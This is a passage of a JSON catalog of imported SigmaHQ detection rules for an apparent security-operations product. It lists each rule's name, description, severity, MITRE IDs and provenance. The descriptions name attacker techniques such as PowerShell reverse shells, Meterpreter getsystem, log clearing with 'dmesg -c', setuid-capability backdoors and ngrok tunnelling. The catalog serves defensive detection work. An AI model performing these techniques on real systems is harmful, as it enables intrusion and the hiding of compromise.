"categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/diagnostic-library-sdiageng-dll-loaded-by-msdt-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ec8c4047-fad9-416a-8c81-0f479353d7f6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_dll_sdiageng_load_by_msdt.yml" } }, { "id": "sigmahq-sigma-eca49c87-8a75-4f13-9c73-a5a29e845f03", "type": "detection", "name": "Suspicious Runscripthelper.exe", "description": "Detects execution of powershell scripts via Runscripthelper.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059", "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-runscripthelper-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "eca49c87-8a75-4f13-9c73-a5a29e845f03", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_runscripthelper.yml" } }, { "id": "sigmahq-sigma-eca5e022-d368-4043-98e5-9736fb01f72f", "type": "detection", "name": "Clear or Disable Kernel Ring Buffer Logs via Syslog Syscall", "description": "Detects the use of the `syslog` syscall with action code 5 (SYSLOG_ACTION_CLEAR),\n(4 is SYSLOG_ACTION_READ_CLEAR and 6 is SYSLOG_ACTION_CONSOLE_OFF) which clears the kernel\nring buffer (dmesg logs). This can be used by attackers to hide traces after exploitation\nor privilege escalation. A common technique is running `dmesg -c`, which triggers this syscall internally.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/clear-or-disable-kernel-ring-buffer-logs-via-syslog-syscall.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "eca5e022-d368-4043-98e5-9736fb01f72f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/syscall/lnx_auditd_clean_disable_dmesg_logs_via_syslog.yml" } }, { "id": "sigmahq-sigma-eca81e8d-09e1-4d04-8614-c91f44fd0519", "type": "detection", "name": "New Firewall Rule Added In Windows Firewall Exception List Via WmiPrvSE.EXE", "description": "Detects the addition of a new \"Allow\" firewall rule by the WMI process (WmiPrvSE.EXE).\nThis can occur if an attacker leverages PowerShell cmdlets such as \"New-NetFirewallRule\", or directly uses WMI CIM classes such as \"MSFT_NetFirewallRule\".", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1686.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-firewall-rule-added-in-windows-firewall-exception-list-via-wmiprvse-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "eca81e8d-09e1-4d04-8614-c91f44fd0519", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/firewall_as/win_firewall_as_add_rule_wmiprvse.yml" } }, { "id": "sigmahq-sigma-eca8ae39-5c3c-4321-b538-9e64fe25822e", "type": "detection", "name": "Installation of WSL Kali-Linux", "description": "Detects installation of Kali Linux distribution through Windows Subsystem for Linux (WSL).\nAttackers may use Kali Linux WSL to leverage its penetration testing tools and capabilities for malicious purposes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/installation-of-wsl-kali-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "eca8ae39-5c3c-4321-b538-9e64fe25822e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wsl_kali_linux_installation.yml" } }, { "id": "sigmahq-sigma-eca91c7c-9214-47b9-b4c5-cb1d7e4f2350", "type": "detection", "name": "Uncommon Outbound Kerberos Connection - Security", "description": "Detects uncommon outbound network activity via Kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1558.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uncommon-outbound-kerberos-connection-security.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "eca91c7c-9214-47b9-b4c5-cb1d7e4f2350", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_susp_outbound_kerberos_connection.yml" } }, { "id": "sigmahq-sigma-ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34", "type": "detection", "name": "Meterpreter or Cobalt Strike Getsystem Service Installation - Security", "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1134.001", "T1134.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/meterpreter-or-cobalt-strike-getsystem-service-installation-security.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml" } }, { "id": "sigmahq-sigma-ed447910-bc30-4575-a598-3a2e49516a7a", "type": "detection", "name": "Linux Setuid Capability Set on a Binary via Setcap Utility", "description": "Detects the use of the 'setcap' utility to set the 'setuid' capability (cap_setuid) on a binary file.\nThis capability allows a non privileged process to make arbitrary manipulations of user IDs (UIDs), including setting its current UID to a value that would otherwise be restricted (i.e. UID 0, the root user).\nThis behavior can be used by adversaries to backdoor a binary in order to escalate privileges again in the future if needed.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1548", "T1554" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/linux-setuid-capability-set-on-a-binary-via-setcap-utility.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ed447910-bc30-4575-a598-3a2e49516a7a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_cap_setuid.yml" } }, { "id": "sigmahq-sigma-ed5d72a6-f8f4-479d-ba79-02f6a80d7471", "type": "detection", "name": "Potential LethalHTA Technique Execution", "description": "Detects potential LethalHTA technique where the \"mshta.exe\" is spawned by an \"svchost.exe\" process", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-lethalhta-technique-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ed5d72a6-f8f4-479d-ba79-02f6a80d7471", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_mshta_lethalhta_technique.yml" } }, { "id": "sigmahq-sigma-ed74fe75-7594-4b4b-ae38-e38e3fd2eb23", "type": "detection", "name": "Outbound RDP Connections Over Non-Standard Tools", "description": "Detects Non-Standard tools initiating a connection over port 3389 indicating possible lateral movement.\nAn initial baseline is required before using this utility to exclude third party RDP tooling that you might use.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1021.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/outbound-rdp-connections-over-non-standard-tools.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ed74fe75-7594-4b4b-ae38-e38e3fd2eb23", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_rdp_outbound_over_non_standard_tools.yml" } }, { "id": "sigmahq-sigma-ed825c86-c009-4014-b413-b76003e33d35", "type": "detection", "name": "Windows Binary Executed From WSL", "description": "Detects the execution of Windows binaries from within a WSL instance.\nThis could be used to masquerade parent-child relationships", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-binary-executed-from-wsl.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ed825c86-c009-4014-b413-b76003e33d35", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wsl_windows_binaries_execution.yml" } }, { "id": "sigmahq-sigma-ed965133-513f-41d9-a441-e38076a0798f", "type": "detection", "name": "Suspicious PowerShell Invocations - Generic", "description": "Detects suspicious PowerShell invocation command parameters", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-powershell-invocations-generic.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ed965133-513f-41d9-a441-e38076a0798f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_invocation_generic.yml" } }, { "id": "sigmahq-sigma-edadb1e5-5919-4e4c-8462-a9e643b02c4b", "type": "detection", "name": "Process Memory Dump via RdrLeakDiag.EXE", "description": "Detects the use of the Microsoft Windows Resource Leak Diagnostic tool \"rdrleakdiag.exe\" to dump process memory", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/process-memory-dump-via-rdrleakdiag-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "edadb1e5-5919-4e4c-8462-a9e643b02c4b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rdrleakdiag_process_dumping.yml" } }, { "id": "sigmahq-sigma-edc2f8ae-2412-4dfd-b9d5-0c57727e70be", "type": "detection", "name": "Potential Powershell ReverseShell Connection", "description": "Detects usage of the \"TcpClient\" class. Which can be abused to establish remote connections and reverse-shells. As seen used by the Nishang \"Invoke-PowerShellTcpOneLine\" reverse shell and other.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/potential-powershell-reverseshell-connection.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "edc2f8ae-2412-4dfd-b9d5-0c57727e70be", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_reverse_shell_connection.yml" } }, { "id": "sigmahq-sigma-edd3ddc3-386f-4ba5-9ada-4376b2cfa7b5", "type": "detection", "name": "Potential EACore.DLL Sideloading", "description": "Detects potential DLL sideloading of \"EACore.dll\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-eacore-dll-sideloading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "edd3ddc3-386f-4ba5-9ada-4376b2cfa7b5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_eacore.yml" } }, { "id": "sigmahq-sigma-edd595d7-7895-4fa7-acb3-85a18a8772ca", "type": "detection", "name": "Steganography Unzip Hidden Information From Picture File", "description": "Detects extracting of zip file from image file", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1027.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/steganography-unzip-hidden-information-from-picture-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "edd595d7-7895-4fa7-acb3-85a18a8772ca", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/execve/lnx_auditd_unzip_hidden_zip_files_steganography.yml" } }, { "id": "sigmahq-sigma-edd8a48c-1b9f-4ba1-83aa-490338cd1ccb", "type": "detection", "name": "Renamed Jusched.EXE Execution", "description": "Detects the execution of a renamed \"jusched.exe\" as seen used by the cobalt group", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1036.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/renamed-jusched-exe-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "edd8a48c-1b9f-4ba1-83aa-490338cd1ccb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_renamed_jusched.yml" } }, { "id": "sigmahq-sigma-ede05abc-2c9e-4624-9944-9ff17fdc0bf5", "type": "detection", "name": "Suspicious DNS Z Flag Bit Set", "description": "The DNS Z flag is bit within the DNS protocol header that is, per the IETF design, meant to be used reserved (unused).\nAlthough recently it has been used in DNSSec, the value being set to anything other than 0 should be rare.\nOtherwise if it is set to non 0 and DNSSec is being used, then excluding the legitimate domains is low effort and high reward.\nDetermine if multiple of these files were accessed in a short period of time to further enhance the possibility of seeing if this was a one off or the possibility of larger sensitive file gathering.\nThis Sigma query is designed to accompany the Corelight Threat Hunting Guide, which can be found here: https://www3.corelight.com/corelights-introductory-guide-to-threat-hunting-with-zeek-bro-logs'", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1095", "T1571" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-dns-z-flag-bit-set.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ede05abc-2c9e-4624-9944-9ff17fdc0bf5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/zeek/zeek_dns_susp_zbit_flag.yml" } }, { "id": "sigmahq-sigma-edf3485d-dac4-4d50-90e4-b0e5813f7e60", "type": "detection", "name": "Suspicious Network Connection to IP Lookup Service APIs", "description": "Detects external IP address lookups by non-browser processes via services such as \"api.ipify.org\". This could be indicative of potential post compromise internet test activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1016" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-network-connection-to-ip-lookup-service-apis.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "edf3485d-dac4-4d50-90e4-b0e5813f7e60", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_domain_external_ip_lookup.yml" } }, { "id": "sigmahq-sigma-ee111937-1fe7-40f0-962a-0eb44d57d174", "type": "detection", "name": "Suspicious OAuth App File Download Activities", "description": "Detects when a Microsoft Cloud App Security reported when an app downloads multiple files from Microsoft SharePoint or Microsoft OneDrive in a manner that is unusual for the user.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-oauth-app-file-download-activities.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ee111937-1fe7-40f0-962a-0eb44d57d174", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/m365/threat_management/microsoft365_susp_oauth_app_file_download_activities.yml" } }, { "id": "sigmahq-sigma-ee218c12-627a-4d27-9e30-d6fb2fe22ed2", "type": "detection", "name": "Powershell Inline Execution From A File", "description": "Detects inline execution of PowerShell code from a file", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-inline-execution-from-a-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ee218c12-627a-4d27-9e30-d6fb2fe22ed2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_exec_data_file.yml" } }, { "id": "sigmahq-sigma-ee2803f0-71c8-4831-b48b-a1fc57601ee4", "type": "detection", "name": "Google Workspace Application Removed", "description": "Detects when an an application is removed from Google Workspace.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/google-workspace-application-removed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ee2803f0-71c8-4831-b48b-a1fc57601ee4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/gcp/gworkspace/admin/gcp_gworkspace_application_removed.yml" } }, { "id": "sigmahq-sigma-ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31", "type": "detection", "name": "PUA - Ngrok Execution", "description": "Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available.\nInvolved domains are bin.equinox.io for download and *.ngrok.io for connections.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1572" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-ngrok-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_ngrok.yml" } }, { "id": "sigmahq-sigma-ee39a9f7-5a79-4b0a-9815-d36b3cf28d3e", "type": "detection", "name": "Okta FastPass Phishing Detection", "description": "Detects when Okta FastPass prevents a known phishing site.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.identity" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1566" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/okta-fastpass-phishing-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ee39a9f7-5a79-4b0a-9815-d36b3cf28d3e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/identity/okta/okta_fastpass_phishing_detection.yml" } }, { "id": "sigmahq-sigma-ee4c5d06-3abc-48cc-8885-77f1c20f4451", "type": "detection", "name": "DLL Sideloading Of ShellChromeAPI.DLL", "description": "Detects processes loading the non-existent DLL \"ShellChromeAPI\". One known example is the \"DeviceEnroller\" binary in combination with the \"PhoneDeepLink\" flag tries to load this DLL.\nAdversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dll-sideloading-of-shellchromeapi-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ee4c5d06-3abc-48cc-8885-77f1c20f4451", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_shell_chrome_api.yml" } }, { "id": "sigmahq-sigma-ee5e119b-1f75-4b34-add8-3be976961e39", "type": "detection", "name": "Conhost.exe CommandLine Path Traversal", "description": "detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/conhost-exe-commandline-path-traversal.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ee5e119b-1f75-4b34-add8-3be976961e39", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_conhost_path_traversal.yml" } }, { "id": "sigmahq-sigma-ee63c85c-6d51-4d12-ad09-04e25877a947", "type": "detection", "name": "New Custom Shim Database Created", "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.\nThe Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.009" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-custom-shim-database-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ee63c85c-6d51-4d12-ad09-04e25877a947", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_creation_new_shim_database.yml" } }, { "id": "sigmahq-sigma-ee6cea48-c5b6-4304-a332-10fc6446f484", "type": "detection", "name": "Potential appverifUI.DLL Sideloading", "description": "Detects potential DLL sideloading of \"appverifUI.dll\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-appverifui-dll-sideloading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ee6cea48-c5b6-4304-a332-10fc6446f484", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_appverifui.yml" } }, { "id": "sigmahq-sigma-ee77a5db-b0f3-4be2-bfd4-b58be1c6b15a", "type": "detection", "name": "Potential Attachment Manager Settings Attachments Tamper", "description": "Detects tampering with attachment manager settings policies attachments (See reference for more information)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-attachment-manager-settings-attachments-tamper.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ee77a5db-b0f3-4be2-bfd4-b58be1c6b15a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_policies_attachments_tamper.yml" } }, { "id": "sigmahq-sigma-ee9ca27c-9bd7-4cee-9b01-6e906be7cae3", "type": "detection", "name": "New PDQDeploy Service - Server Side", "description": "Detects a PDQDeploy service installation which indicates that PDQDeploy was installed on the machines.\nPDQDeploy can be abused by attackers to remotely install packages or execute commands on target machines", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-pdqdeploy-service-server-side.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": 